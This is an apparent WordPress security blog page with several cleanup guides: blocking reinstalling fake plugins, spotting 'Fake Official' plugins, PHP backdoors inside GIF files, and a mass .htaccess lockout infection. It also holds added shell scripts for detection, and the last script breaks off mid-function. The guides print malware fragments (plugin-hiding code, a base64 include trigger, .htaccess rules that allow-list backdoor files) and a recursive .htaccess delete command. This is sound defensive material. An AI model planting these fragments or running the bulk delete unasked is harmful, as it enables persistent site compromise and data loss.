Category: Website Security

  • How to Prevent Fake Hidden Plugins from Reinstalling on WordPress

    Quick Fix: Stop WordPress Plugins from Reinstalling

    If a malicious plugin keeps appearing after you delete it, use the “Filesystem Block” technique:

    1. Identify the Name: Note the exact folder name of the malware (e.g., wp-zcp).
    2. Delete the Folder: Remove the malicious plugin folder via FTP or File Manager.
    3. Create a Dummy File: Create a new empty file (not a folder) with the exact same name.
    4. Lock Permissions: Set the file permissions to 000 so the malware cannot overwrite or delete it.

    Why it works: A server cannot have a file and a folder with the same name in the same place. The file blocks the folder.

    There is nothing more infuriating for a WordPress website owner than battling a “zombie plugin.”

    You know the scenario: you find a suspicious, hidden plugin on your site—perhaps named something generic like “hellos,” “wp-zcp,” or “security-patch.” You delete it. You breathe a sigh of relief. Five minutes later, you refresh your file manager, and it’s back.

    How does this happen? And more importantly, how do you stop something that keeps automatically reinstalling itself?

    Recently, a clever WordPress user discovered a brilliant, low-tech solution that exploits the basic logic of computer servers to stop these reinfections in their tracks. It acts like a physical roadblock for malware.

    Here is how to use the “Filesystem Block” technique to stop fake plugins from reappearing.


    Step 1: Why Does the Malware Keep Coming Back?

    When your site is compromised, the hacker rarely just installs a bad plugin once. They usually leave behind a “Backdoor Script” or create a “Cron Job” (a scheduled server task).

    This malicious script runs in the background every few minutes and checks:

    “Does the bad folder ‘wp-content/plugins/hellos’ exist?”

    If you deleted it, the script says:

    “Nope, it’s gone. Time to recreate it.”

    It then downloads the malware again and rebuilds the folder. This is why you feel like you are fighting a losing battle.


    Step 2: The “Aha!” Moment (Exploiting Server Logic)

    The solution lies in a very simple rule that governs almost every operating system, including the Linux servers that run most hosting plans:

    The Rule: You cannot have a FILE and a FOLDER with the exact same name in the same location.

    If you try to create a folder named my-stuff, but a file named my-stuff already sits there, the server will throw an error: “File exists.”

    We can use this rule against the hacker.

    If we know the malware wants to create a plugin folder named hellos, we can beat it to the punch by creating an undeletable file with that exact same name. When the malware script tries to run its “create folder” command, it hits a brick wall and fails.


    Step 3: How to Implement the Filesystem Block

    This process works best if the malware is “dumb” and always uses the exact same name (e.g., it always tries to create “wp-security-check”).

    Disclaimer: This is a hardening technique. You still need to find and remove the actual backdoor script that is attempting the reinstall, but this will stop the bleeding in the meantime.

    1. Identify the Enemy

    Find the name of the fake plugin or theme folder. For this example, let’s say the bad folder is inside wp-content/plugins/ and is named: fake-plugin-xyz

    • First, delete that malicious folder completely.

    2. Create the Dummy File

    You need to use your hosting File Manager (like cPanel) or FTP.

    1. Navigate to the wp-content/plugins/ directory.
    2. Create a new, empty file. (Make sure you select “File”, not “Folder”).
    3. Name it exactly: fake-plugin-xyz
    4. Crucial note: Do not add an extension like .txt or .php. Just the name.

    Now, you have an empty file sitting where the malware wants its folder to be.

    3. Lock the File Down (Make it Invincible)

    If the malware script is smart, it might try to delete your dummy file before creating its folder. We need to prevent that by changing the file permissions.

    Using cPanel / File Manager:

    1. Right-click on your new dummy file named fake-plugin-xyz.
    2. Select Change Permissions or Permissions.
    3. Uncheck every single box. The numeric value should be 000 (or sometimes 444 depending on your host).
    4. Save.

    By setting permissions to 000, you are telling the server: “Nobody can read this, nobody can write to this, and nobody can execute this.”

    Now, when the hacker’s script tries to delete or overwrite your file, the server will deny permission, and the infection fails.
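
    The same steps from an SSH session, as an added example that is not part of the original article: it places the placeholder, classifies whatever currently occupies the name, and confirms that folder creation is refused. The function names are made up for this sketch, the directory layout is constructed in a temporary folder, and fake-plugin-xyz is the article's example name.

```shell
#!/bin/sh
# Added example: place and audit a "Filesystem Block" placeholder.
# Function names are illustrative; fake-plugin-xyz is the article's example.

# perms PATH -> ten-character type/mode string from ls, e.g. "----------"
perms() { ls -ld -- "$1" | cut -c1-10; }

# block_status PLUGINS_DIR NAME -> prints one word:
#   open        nothing occupies the name, so a folder can be created
#   reinfected  a directory with that name exists (the folder is back)
#   blocked     a regular file with mode 000 occupies the name
#   weak        a regular file occupies the name but is not mode 000
#   unexpected  a symlink or special file occupies the name
block_status() {
    target="$1/$2"
    if [ -L "$target" ]; then echo unexpected
    elif [ -d "$target" ]; then echo reinfected
    elif [ -f "$target" ]; then
        if [ "$(perms "$target")" = "----------" ]; then echo blocked
        else echo weak
        fi
    elif [ -e "$target" ]; then echo unexpected
    else echo open
    fi
}

# place_block PLUGINS_DIR NAME -> create the empty placeholder and lock it.
# Refuses to touch anything that already exists, so nothing is overwritten.
place_block() {
    target="$1/$2"
    if [ -e "$target" ] || [ -L "$target" ]; then
        echo "refusing: $target already exists" >&2
        return 1
    fi
    : > "$target" && chmod 000 "$target"
}

# mkdir_is_refused PLUGINS_DIR NAME -> succeeds when the OS rejects creating
# a folder under that name (the "File exists" error from Step 2).
mkdir_is_refused() {
    if mkdir "$1/$2" 2>/dev/null; then
        rmdir "$1/$2"        # nothing was blocking: undo our own test folder
        return 1
    fi
    return 0
}

# audit_block PLUGINS_DIR NAME -> one report line. The directory mode is
# included because removing or renaming an entry is governed by write
# permission on the containing directory, so a plugins directory that the
# web server user can write to deserves a second look.
audit_block() {
    echo "$2: $(block_status "$1" "$2") (plugins dir mode $(perms "$1"))"
}

# Demo on a constructed layout in a temporary directory.
demo() {
    tmp=$(mktemp -d) || return 1
    plugins="$tmp/wp-content/plugins"
    mkdir -p "$plugins"
    audit_block "$plugins" fake-plugin-xyz          # open
    place_block "$plugins" fake-plugin-xyz
    audit_block "$plugins" fake-plugin-xyz          # blocked
    mkdir_is_refused "$plugins" fake-plugin-xyz && echo "mkdir refused"
    rm -rf "$tmp"
}
demo
```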


    Pro Tip: The “Nuclear Option” (SSH Users)

    If you are on advanced hosting with SSH terminal access, you can use an even stronger method called the “immutable attribute.” This stops even the root user from accidentally deleting it.

    Run this command in the plugins directory:

    chattr +i fake-plugin-xyz

    To remove the file later, you would need to use chattr -i fake-plugin-xyz first.


    Limitations of This Method

    This trick is incredibly effective against automated bots, but it is not a cure-all.

    • Randomized Names: If the malware generates a new, random name every time it reinstalls (e.g., plugin-a8j2, then plugin-k9c1), this trick won’t work because you can’t predict the name to block.
    • Root Access: If the attacker has managed to gain “root” (super-admin) access to the entire server, they can override your permissions. Fortunately, most shared hosting hacks do not have this level of access.

    Summary

    Using a dummy file to block malicious folders is a fantastic, clever example of using basic system logic for security hardening. It acts like a digital “Do Not Enter” sign that automated malware scripts can’t ignore. It buys you crucial time to find the actual source of the infection and clean your site properly.

  • Why WordPress Malware Keeps Coming Back (And How to Stop It Permanently)

    Quick Fix: The “Reinfection Cheat Sheet”

    If your WordPress site keeps getting hacked after cleaning, check these 5 hidden spots:

    1. Check WP-Cron: Install a cron manager plugin. Look for events with random names (e.g., wp_update_core_sys) scheduled to run daily.
    2. Hunt for “Ghost” Admins: Check the wp_users table in your database directly via phpMyAdmin. Hackers hide accounts from the dashboard.
    3. Inspect wp-content/mu-plugins: This folder loads plugins automatically. If you didn’t create a file here, delete it.
    4. Look for “Fake” Plugins: Check wp-content/plugins for folders that mimic real names (e.g., wordfence-security-pro-patch).
    5. Replace Core Files: Don’t just clean. Delete wp-admin and wp-includes and upload fresh copies from WordPress.org.

    Is your WordPress site stuck in a nightmare loop?

    You scan the site, delete the infected files, and see the “All Clean” green checkmark. You think the battle is won. But then—often exactly at midnight or 24 hours later—the malware is back. The redirects start again. The hosting provider suspends your account.

    This is the “Reinfection Loop,” and it is the single most frustrating problem for website owners.

    I have cleaned thousands of hacked sites, and here is the hard truth: If your site keeps getting reinfected, you didn’t miss a file. You missed a mechanism.

    Scanners like Wordfence or Sucuri are great tools, but they often miss “smart” malware that hides in the database, disguises itself as a legitimate plugin, or lives inside your cron jobs.

    In this guide, I will show you exactly where the infection is hiding and how to break the cycle permanently.


    🔑 Key Points: Why “Clean” Sites Get Hacked Again

    • Scanners have blind spots: Most scanners look for known malware signatures. If a hacker writes a custom backdoor, the scanner sees it as “safe” code.
    • The “Time Bomb” effect: Hackers use Cron Jobs to schedule a re-download of the virus. You delete the virus file, but the “alarm clock” (Cron) is still ticking.
    • Hidden Entrances: Backdoors are often hidden in innocent-looking files like images (.jpg, .gif) or fake plugin folders.

    Reason 1: The “Green Scan” Lie (Why Scanners Fail)

    The biggest mistake I see clients make is trusting the “Green Shield.” You run a scan, it says “No Malware Found,” so you assume the site is safe.

    Here is why that is dangerous.

    Sophisticated malware developers know exactly how security plugins work. They write code that looks legitimate. For example, I recently analyzed a site where the malware was hiding inside a plugin that looked like a “compatibility fix.” It was called wp-compat, and it had a backdoor that allowed the hacker to upload files whenever they wanted.

    Read more: The wp-compat Plugin: The Hidden Backdoor in Your WordPress Site

    Because the folder name looked “boring” and technical, the site owner ignored it. The scanner ignored it too, because the code inside used standard PHP functions—just used maliciously.

    The “Official Plugin” Trick

    Another common tactic is creating folders that sound like they belong to WordPress or popular plugins. I have seen malware hide in folders named wp-security-team or wordpress-core-update.

    If you see a plugin in your file manager (cPanel) that does not appear in your WordPress Dashboard plugin list, it is almost certainly malware.

    Read more: New Malware Alert: The Fake “Official” Plugin Attack


    Reason 2: The “Midnight” Reinfection (Cron Jobs)

    Does your malware come back at a specific time? Maybe every day at 12:00 AM or every 6 hours?

    This is a classic sign of a Cron Job Hack.

    WordPress has a built-in scheduling system called WP-Cron. It handles scheduled posts and update checks. Hackers love this feature. They inject a tiny line of code into your database that says:

    “Every day at 00:00, go to this external URL, download the virus, and reinstall it.”

    You can delete every malicious file on your server, but if you don’t delete this instruction from the database, the site will re-infect itself automatically. This is why you feel like you are chasing a ghost.

    Read more: Why Malware Keeps Coming Back: Hidden Cron Job Hack Explained


    Reason 3: Ghost Admins and Hidden Users

    Sometimes, the “virus” isn’t a file at all. It’s a person.

    When hackers break in, the first thing they do is create a backup Admin user for themselves. But they are smart—they add a snippet of code to functions.php that tells WordPress: “Do not show this user in the Users list.”

    You look at your “Users” page, and you see only yourself. Meanwhile, the hacker logs in every night using their hidden account to re-upload the malware you just deleted.

    To catch this, you cannot rely on the WordPress dashboard. You must look at the wp_users table in your database (using phpMyAdmin) or use a deep-scan method.

    Read more: How to Find and Remove Hidden Admin Users in WordPress


    Reason 4: Malware Hiding in Images (.jpg, .gif, .ico)

    You might think, “It’s just a picture, it can’t hurt me.”

    Wrong.

    One of the sneakiest reinfection methods involves hiding PHP code inside image files. The hacker uploads a file named logo.jpg. If you open it, it looks like a blurry image or just code gibberish. But the server is tricked into treating this “image” as an executable program.

    I recently found a backdoor hidden inside a .gif file. The scanner skipped it because scanners are configured to skip media files to save speed. This left a permanent open door for the hacker.

    Read more: Can a JPG File Contain Malware? Uncovering the Fake Image Backdoor
    Read more: The Hidden Threat: How Malware Hides in GIF Files


    Reason 5: The .htaccess Redirection Trap

    If your site is redirecting to gambling or pharmaceutical sites (especially on mobile devices), the problem is usually in your .htaccess file.

    This file controls how your server directs traffic. Hackers inject rules here that say: “If the visitor is coming from Google, send them to getfix.win.”

    The tricky part? They often add 500 lines of “white space” before the malicious code. When you open the file to check it, it looks empty or normal at the top. You have to scroll all the way down to find the virus.

    Read more: The Ultimate Guide to Removing .htaccess Malware


    The Step-by-Step “Deep Clean” Strategy

    If you are tired of the reinfection loop, stop doing “quick scans.” You need a surgical removal process. Here is the checklist I use for my clients.

    Step 1: Manual File Inspection

    Don’t just rely on plugins. Log into your hosting via FTP or File Manager.

    1. Go to wp-content/plugins. Open every folder. Do you recognize all of them? If you see wp-security-patch or wp-z-compat, delete them.
    2. Go to wp-content/uploads. Look for any PHP files hiding in your year/month folders. Uploads should never contain PHP files.

    Read more: Hidden Backdoors & Fake Plugins: How Hackers Live in Dashboard

    Step 2: Clean the Database

    Malware strings often hide in the wp_options table (especially the siteurl or home rows if you have redirects).

    1. Open phpMyAdmin.
    2. Search for <script> or eval( or base64.
    3. Check specifically for executable files that shouldn’t be there.

    Read more: Removing Hidden Executable Files (Case Study)

    Step 3: Check Core Files (functions.php & wp-config.php)

    The functions.php file in your active theme is the #1 spot for “Ghost Admin” code. Open it and look for strange code at the very top or very bottom.

    Also, check wp-config.php. Hackers sometimes modify this file to point to a different database or include a malicious file before WordPress even loads.

    Read more: Found Suspicious Code in functions.php? The Ghost Admin Hack

    Step 4: The “Nuclear” Option (Fresh Core Install)

    If you can’t find the file, replace the system.

    1. Download a fresh ZIP from WordPress.org.
    2. Delete wp-admin and wp-includes from your server.
    3. Upload the fresh copies.

    Note: Do not delete wp-content or wp-config.php.


    Post-Cleanup: How to Lock the Door

    Cleaning the malware is only 50% of the job. You must close the holes they used to get in.

    1. Change Your Salts

    WordPress uses “Salts” to encrypt login cookies. If a hacker has a valid cookie, they can stay logged in even if you change your password. You must update your Security Keys in wp-config.php to force-logout everyone (including the hacker).

    2. Update Everything

    A vulnerable plugin is an open window. If you are running an old version of Elementor or a shady “nulled” theme, you will be hacked again in 24 hours.

    3. Set Up Backups (Off-Site)

    If this happens again, you need a clean version to revert to. Do not store backups on the same server! Use a tool like UpdraftPlus to send backups to Google Drive or Dropbox.

    Read more: How to Back Up Your WordPress Site with UpdraftPlus (2025 Guide)

    4. Checklist Review

    I have compiled a complete 60-point checklist of signs that your site is still infected. Go through this list one by one.

    Read more: 60 Clear Signs Your WordPress Site is Hacked
    Read more: What to Do After Fixing a Hacked Site (Real Cleanup Checklist)


    FAQ: Questions My Clients Always Ask

    Q: Why does malware come back every day at the same time?

    A: This is almost certainly a Cron Job or a scheduled external script hitting your site. The malware isn’t “living” on your site; it is being “re-delivered” by a script. Check your Cron events immediately.

    Q: Can a “Factory Reset” remove malware?

    A: Yes and no. If you reset the files but keep the database, the infection (which often lives in the database) will survive. You must clean both files and the database.

    Q: Why didn’t Wordfence/Sucuri detect it?

    A: Scanners look for “Signatures” (fingerprints). If the hacker wrote a brand new, custom piece of code (like the Fake Security Team Malware), it has no fingerprint yet. Scanners are helpful, but they are not human.

    Q: Is it safe to use “Nulled” plugins?

    A: Never. 99% of “free pro plugins” contain pre-installed backdoors. This is the #1 cause of reinfection.


    Still Can’t Stop the Reinfection?

    If you have followed this guide, checked the cron jobs, replaced the core files, and the malware still comes back, you likely have a “root level” infection or a complex database injection.

    Some malware is designed to be impossible to remove without reading the raw code logs. If you are losing money every minute your site is down, you might need a specialist to dig deeper than a plugin can.

    Read my case study: I Found a Hidden Backdoor in a Client’s Site (Real Story)

    Don’t let hackers win. Be thorough, be paranoid, and check every single file.

  • New Malware Alert: The “Fake Official” Plugin Attack (wp-kludge-allow & Variants)

    If you are reading this, you likely found a strange folder in your wp-content/plugins directory with a name that sounds technically impressive but meaningless—something like wp-kludge-allow, wp-analyzer-philosophy, or wp-systematize-marketplace.

    You might be wondering: “Did I install this? Is it a core WordPress file?”

    The answer is no. You are looking at a sophisticated piece of malware designed to impersonate an official WordPress component. We call this the “Fake Official” Plugin Attack.

    Here is a breakdown of what this malware does, why it is dangerous, and how to remove it.

    The Disguise: “Official WordPress Plugin”

    Most WordPress malware tries to be invisible. This variant takes a different approach: Audacity.

    If you open the main PHP file inside one of these folders (e.g., wp-kludge-allow/index.php), you will see a file header that looks legitimate:

    /*
    Plugin Name: WP Kludge Allow
    Description: Official WordPress plugin
    Author: WordPress
    Version: 12.7.0
    */

    The attackers explicitly label it as an “Official WordPress plugin” authored by “WordPress”. They even assign it a high version number (like 12.7.0) to make it appear stable and essential.

    This is a Social Engineering tactic. The goal is to make a developer or site owner hesitate before deleting it, fearing they might break the site by removing a “core” feature.

    How It Works: The “Invisible” Plugin

    You might ask, “If this is a plugin, why didn’t I see it in my dashboard?”

    This is the malware’s primary trick. It contains specific code designed to scrub its own existence from your WordPress admin panel while still running in the background.

    1. Ghost Mode (Hiding from the Dashboard)

    The malware hooks into the pre_current_active_plugins action. Just before WordPress displays your plugin list, the malware runs a function (often named rhi_cbx or similar) that finds its own filename in the list and unsets it.

    // Malware code that removes itself from the list table
    if (in_array($key, $h)) {
        unset($wp_list_table->items[$key]);
    }

    This ensures that even though the plugin is active, it is completely invisible on the Plugins > Installed Plugins page.

    2. The Backdoor (Direct Access)

    This malware has a “split personality” controlled by a simple check: if (defined('ABSPATH')).

    • If loaded by WordPress: It hides itself and stays dormant to avoid detection.
    • If loaded directly (by a hacker): It executes a malicious payload.

    If a hacker accesses the file directly in a browser (e.g., yoursite.com/wp-content/plugins/wp-kludge-allow/index.php), the script bypasses WordPress security and runs an obfuscated function named fif.

    In the samples we analyzed, this function often decodes a string to point to your .htaccess file and attempts to include it. This suggests the attackers have hidden malicious PHP code inside your .htaccess file, using this “plugin” as the trigger to execute it.

    Indicators of Compromise

    Check your /wp-content/plugins/ directory via FTP or your hosting File Manager. If you see folders with generated “nonsense” names, your site is likely infected. Common names seen in this attack wave include:

    • wp-kludge-allow
    • wp-analyzer-philosophy
    • wp-systematize-marketplace
    • wp-plugin-hostgator (mimicking legitimate hosting tools)
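
    A heuristic sweep for the traits described above, as an added example that is not part of the original article: it flags top-level plugin files whose header names WordPress as the author or calls itself an official plugin, and files that reference the pre_current_active_plugins hook. The function names and both sample plugins are constructed; a hit is a lead to review by hand, not proof.

```shell
#!/bin/sh
# Added example: flag plugin files that match the "Fake Official" traits.
# Function names are illustrative, not part of WordPress.

# header_field FILE FIELD -> value of a plugin header field, read from the
# first 8 KB only (the part WordPress reads when it parses plugin headers).
header_field() {
    head -c 8192 "$1" | tr -d '\r' |
        sed -n "s|^[[:space:]/*#@]*$2:[[:space:]]*||p" |
        sed 's/[[:space:]]*$//' | head -n 1
}

# plugin_flags FILE -> space-separated flags, or "none"
#   claims-official  header says Author "WordPress" or "Official WordPress plugin"
#   hides-from-list  file references the pre_current_active_plugins hook
plugin_flags() {
    flags=""
    author=$(header_field "$1" Author)
    desc=$(header_field "$1" Description)
    if [ "$author" = "WordPress" ]; then flags="claims-official"; fi
    case $desc in
        *"Official WordPress plugin"*) flags="claims-official" ;;
    esac
    if grep -q 'pre_current_active_plugins' "$1"; then
        flags="${flags:+$flags }hides-from-list"
    fi
    echo "${flags:-none}"
}

# scan_plugins PLUGINS_DIR -> "flags<TAB>path" for each flagged top-level file
scan_plugins() {
    for f in "$1"/*/*.php; do
        [ -f "$f" ] || continue
        r=$(plugin_flags "$f")
        [ "$r" = none ] || printf '%s\t%s\n' "$r" "$f"
    done
}

# make_sample DIR -> constructed fixture: one fake "official" plugin using the
# header quoted in the article (no payload), and one ordinary plugin.
make_sample() {
    mkdir -p "$1/plugins/wp-kludge-allow" "$1/plugins/contact-form"
    cat > "$1/plugins/wp-kludge-allow/index.php" <<'EOF'
<?php
/*
Plugin Name: WP Kludge Allow
Description: Official WordPress plugin
Author: WordPress
Version: 12.7.0
*/
add_action('pre_current_active_plugins', 'rhi_cbx'); // constructed line
EOF
    cat > "$1/plugins/contact-form/contact-form.php" <<'EOF'
<?php
/*
Plugin Name: Contact Form
Description: Simple contact form
Author: Example Dev
Version: 1.2.0
*/
EOF
}

demo() {
    tmp=$(mktemp -d) || return 1
    make_sample "$tmp"
    scan_plugins "$tmp/plugins"
    rm -rf "$tmp"
}
demo
```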

    How to Fix It

    1. Delete the Folders: These are not core files. You can safely delete the entire folder (e.g., wp-kludge-allow).
    2. Check Your .htaccess: Since the malware attempts to load this file, check your root .htaccess file for hidden PHP code or malicious directives.
    3. Scan for Others: This malware often drops multiple copies with different names. Ensure you check all folders in your plugins directory.
    4. Change Passwords: As with any compromise, reset all admin passwords and salt keys immediately.

    Have you found a folder with a different name that follows this pattern? Drop the name in the comments below to help others identify this malware.

  • The Hidden Threat: How Malware Hides in GIF Files on WordPress

    When you think of a hacked website, you typically imagine defaced homepages, redirects to spam sites, or locked admin panels. You rarely suspect the innocent-looking images sitting in your media folders.

    However, a dangerous and rising trend in WordPress cybersecurity involves hackers hiding malicious backdoors inside files named as images (like .gif or .jpg). If your security scanner recently flagged an “Unknown file in WordPress core” with a name like w-feedebbbbc.gif or xit-3x.gif, do not ignore it.

    That “image” is likely a dangerous backdoor. Here is how this attack works, why hackers use it, and how to clean it up.

    The Deception: It’s Not Actually a GIF

    In a standard scenario, if a hacker tries to upload a malicious .php script to a secured WordPress site, firewalls and built-in filters will often block it immediately. To bypass these defenses, attackers use a technique called Extension Spoofing.

    They rename their malicious PHP scripts to .gif. To a human or a basic file filter, image.gif looks harmless. But to the server, a file is just data. If the attacker can trick the server into treating that “image” as a script, the server will execute the code hidden inside.

    Anatomy of the Attack

    Based on recent malware samples (specifically the “Jue Jiang” or “Open Cache” variants), this attack follows a sophisticated three-step infection process:

    1. The “Drop”

    The malware creates a file with a deceptive name, such as wp-includes/images/xit-3x.gif. Despite the extension, this file contains obfuscated PHP code—often a Webshell that gives the hacker full control over your files. The code often includes a fake GIF header (like GIF89a) at the very top to trick scanners into thinking it is a valid image preview.

    2. The Core Infection

    The malware doesn’t stop at creating the fake image. It scans your legitimate WordPress core files to find one that runs on every page load. A common target is:

    wp-includes/general-template.php

    3. The “Include” Trigger

    This is the most dangerous part. The malware injects a tiny, invisible line of code into that core file. It looks something like this:

    @include base64_decode("...path to gif...");

    This command tells WordPress: “When you load the website template, also load and run whatever code is hiding inside that GIF file.” Because PHP’s include function generally ignores file extensions, the server executes the malicious GIF as code, granting the attacker persistent access to your site.

    How to Identify This Infection

    How do you know if your “images” are actually malware?

    • Security Scans: Tools like Wordfence are excellent at detecting this. Look for warnings that say “Unknown file in WordPress core” located in folders like /wp-includes/images/.

    • File Type Mismatch: If you look at the file details in your scanner or file manager, check the Type. If it says “File” or “PHP Script” instead of “Image,” it is malicious.

    • Permissions: This specific malware often sets the file permissions to 444 (Read Only). This prevents you from easily deleting the file via the WordPress dashboard.
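
    A scanner-independent version of these checks, as an added example that is not part of the original article; it also covers the earlier advice on this page that wp-content/uploads should never contain PHP files. It compares each image file's leading bytes with its extension, looks for a PHP open tag inside it, and lists PHP files that include a base64-decoded path. The function names and sample files are constructed, and the samples are inert.

```shell
#!/bin/sh
# Added example: find "images" that are really PHP, and the include that
# loads them. Function names are illustrative; sample files are inert.

# magic_type FILE -> gif | jpg | png | ico | unknown, from the leading bytes
magic_type() {
    hex=$(od -An -tx1 -N8 "$1" | tr -d ' \n')
    case $hex in
        474946383761*|474946383961*) echo gif ;;   # GIF87a / GIF89a
        ffd8ff*)                     echo jpg ;;
        89504e470d0a1a0a*)           echo png ;;
        00000100*)                   echo ico ;;
        *)                           echo unknown ;;
    esac
}

# classify_media FILE -> ok | php-in-image | type-mismatch | script | skipped
classify_media() {
    ext=$(printf '%s' "${1##*.}" | tr 'A-Z' 'a-z')
    case $ext in
        php)  echo script; return ;;
        jpeg) ext=jpg ;;
        gif|jpg|png|ico) ;;
        *)    echo skipped; return ;;
    esac
    if LC_ALL=C grep -qiF '<?php' "$1"; then echo php-in-image
    elif [ "$(magic_type "$1")" != "$ext" ]; then echo type-mismatch
    else echo ok
    fi
}

# scan_media DIR -> "verdict<TAB>path" for everything that is not ok/skipped.
# Point it at wp-content/uploads or wp-includes/images.
scan_media() {
    find "$1" -type f | while IFS= read -r f; do
        v=$(classify_media "$f")
        case $v in
            ok|skipped) ;;
            *) printf '%s\t%s\n' "$v" "$f" ;;
        esac
    done
}

# encoded_includes DIR -> PHP files that include/require a base64-decoded
# path, the trigger shape shown in the article.
encoded_includes() {
    pat='(include|require)(_once)?[[:space:]]*\(?[[:space:]]*base64_decode[[:space:]]*\('
    find "$1" -type f -name '*.php' -exec grep -lE "$pat" {} + || true
}

# make_sample DIR -> constructed fixture tree (file name xit-3x.gif is the
# one quoted in the article; contents are placeholders).
make_sample() {
    mkdir -p "$1/wp-includes/images" "$1/wp-content/uploads/2025/01"
    # Header-only stand-in for a real GIF.
    printf 'GIF89a\001\000\001\000\200\000\000' > "$1/wp-includes/images/spinner.gif"
    # GIF magic followed by an inert PHP tag.
    printf 'GIF89a<?php /* inert placeholder */ ?>' > "$1/wp-includes/images/xit-3x.gif"
    # Plain text wearing a .jpg extension.
    printf 'not an image\n' > "$1/wp-content/uploads/2025/01/logo.jpg"
    printf '<?php // inert placeholder\n' > "$1/wp-content/uploads/2025/01/cache.php"
    printf '%s\n' '<?php' '@include base64_decode("CONSTRUCTED");' \
        > "$1/wp-includes/general-template.php"
}

demo() {
    tmp=$(mktemp -d) || return 1
    make_sample "$tmp"
    scan_media "$tmp/wp-includes/images"
    scan_media "$tmp/wp-content/uploads"
    encoded_includes "$tmp/wp-includes"
    rm -rf "$tmp"
}
demo
```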

    How to Clean and Fix

    If you find a malicious GIF backdoor, follow these steps carefully. Do not simply delete the GIF file first.

    1. Check Core Integrity: Because the malware modifies legitimate core files (like general-template.php) to load the GIF, deleting the GIF first might break your site (causing a Fatal Error because the core file is trying to load a missing file).

    2. Reinstall WordPress Core: The safest way to remove the infection from core files is to replace them with fresh copies. Go to Dashboard > Updates and click “Re-install Now”. This overwrites the infected PHP files with clean ones from WordPress.org.

    3. Delete the Fake Images: Once the core files are clean, you can safely delete the malicious .gif files identified by your scanner.

    4. Reset Secrets: Force a logout for all users by changing your salt keys in wp-config.php and reset all administrator passwords.

    Summary

    Files ending in .gif, .png, or .jpg are not always safe. By disguising PHP code as images and modifying core system files to load them, hackers can maintain long-term access to your website while evading basic detection.

    Regular file integrity monitoring and keeping your security plugins active are your best defense against these hidden threats.

  • Case Study: Cleaning 1,162 Infected .htaccess Files on Bluehost (The “Lockout” Hack)

    Malware infections on shared hosting can spread like wildfire. We recently tackled a massive infection on a Bluehost cPanel account where the scanner lit up with over 1,162 infected files.

    The culprit? A malicious code injection inside the .htaccess file that replicated itself across every single directory—including the trash.

    Here is a deep dive into this specific “Lockout” malware, how it works, and the single command line trick we used to delete all 1,162 infections in seconds.

    The Symptoms: “403 Forbidden” and Massive Scan Results

    The client approached us after their site started throwing errors and their hosting account was flagged. Upon running a server-side scan, the results were alarming:

    As you can see in the scan log above, the infection wasn’t just in the public HTML folder. It had spread to:

    • Theme directories (/Divi/includes/...)
    • Image folders
    • The Trash Folder: A significant number of infections were found in /.trash/, meaning even “deleted” files were harboring the virus.

    Analyzing the Malware Code

    Unlike some malware that redirects traffic or injects ads, this specific hack is designed to lock the site owner out while maintaining a secret backdoor for the hacker.

    Here is the code we found inside the infected files:

    <FilesMatch ".(py|exe|php)$">
    Order allow,deny
    Deny from all
    </FilesMatch>
    <FilesMatch "^(index.php|lock360.php|wp-l0gin.php|wp-the1me.php|wp-scr1pts.php|wp-admin.php|radio.php|content.php|about.php|wp-login.php|admin.php|mah.php|jp.php|ext.php)$">
    Order allow,deny
    Allow from all
    </FilesMatch>

    The “Lockout” Strategy:

    1. Blocks All PHP Execution: The first block stops virtually every PHP script on your site from running. This is why legitimate plugins or themes break immediately.
    2. Whitelists the Backdoors: The second block explicitly allows specific files to run. While some look normal (index.php, wp-login.php), others are 100% malicious backdoors:
      • lock360.php
      • wp-l0gin.php (Notice the zero instead of an ‘o’)
      • wp-the1me.php
      • mah.php

    The Fix: How to Delete 1,162 Files in 5 Seconds

    Manually deleting 1,162 files via FTP would take hours. Since this malware infected every .htaccess file in the directory, the fastest solution was the “Nuclear Option”: Delete them all and regenerate the clean ones.

    We used the cPanel Terminal (available on Bluehost) to run a powerful find-and-delete command.

    The Command We Used:

    find . -name .htaccess -delete

    What this command does:

    • find . : Starts searching in the current directory (public_html).
    • -name .htaccess : Looks for any file named exactly “.htaccess”.
    • -delete : Instantly deletes every match it finds.
    ⚠️ Important: This command deletes ALL .htaccess files. After running this, you must log in to your WordPress Dashboard, go to Settings > Permalinks, and click “Save Changes” to regenerate a clean, safe .htaccess file.
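
    A triage pass to run before the delete, as an added example that is not part of the original case study: it lists only the .htaccess files that carry this lockout block, prints the file names the block allow-lists, and reports rules hidden after a long run of blank lines, the trick described under Reason 5 earlier on this page. The function names, the 20-line threshold and the sample tree are constructed.

```shell
#!/bin/sh
# Added example: triage .htaccess files before deleting anything.
# Function names and the blank-line threshold are illustrative.

# lockout_htaccess ROOT -> paths of .htaccess files that mention any of the
# backdoor names taken from the allow-list shown in the case study
lockout_htaccess() {
    find "$1" -type f -name .htaccess -exec grep -lF \
        -e 'lock360.php' -e 'wp-l0gin.php' -e 'wp-the1me.php' \
        -e 'wp-scr1pts.php' -e 'mah.php' {} + || true
}

# allowlisted_names FILE -> one name per line from every FilesMatch block
# that contains "Allow from all" (the files kept reachable by the block)
allowlisted_names() {
    awk '
        { low = tolower($0) }
        low ~ /<filesmatch/    { pat = $0; next }
        low ~ /<\/filesmatch>/ { pat = ""; next }
        low ~ /allow from all/ && pat != "" {
            s = pat
            sub(/^[^(]*\(/, "", s); sub(/\).*$/, "", s)
            n = split(s, names, "[|]")
            for (i = 1; i <= n; i++) print names[i]
        }' "$1"
}

# padded_rule_line FILE [MIN] -> line number of the first non-blank line that
# follows MIN or more consecutive blank lines (default 20); empty if none
padded_rule_line() {
    awk -v min="${2:-20}" '
        /^[ \t\r]*$/ { blank++; next }
        blank >= min { print NR; exit }
                     { blank = 0 }' "$1"
}

# make_sample DIR -> constructed fixture tree
make_sample() {
    mkdir -p "$1/public_html/wp-content/uploads" "$1/public_html/blog"
    # Lockout block as shown in the case study.
    cat > "$1/public_html/wp-content/uploads/.htaccess" <<'EOF'
<FilesMatch ".(py|exe|php)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(index.php|lock360.php|wp-l0gin.php|wp-the1me.php|wp-scr1pts.php|wp-admin.php|radio.php|content.php|about.php|wp-login.php|admin.php|mah.php|jp.php|ext.php)$">
Order allow,deny
Allow from all
</FilesMatch>
EOF
    # Constructed padded file: 3 normal lines, 500 blank lines, 1 trailing rule.
    {
        printf '%s\n' '# BEGIN WordPress' 'RewriteEngine On' '# END WordPress'
        awk 'BEGIN { for (i = 0; i < 500; i++) print "" }'
        printf '%s\n' 'RewriteRule ^ https://placeholder.invalid/ [R,L]'
    } > "$1/public_html/blog/.htaccess"
}

demo() {
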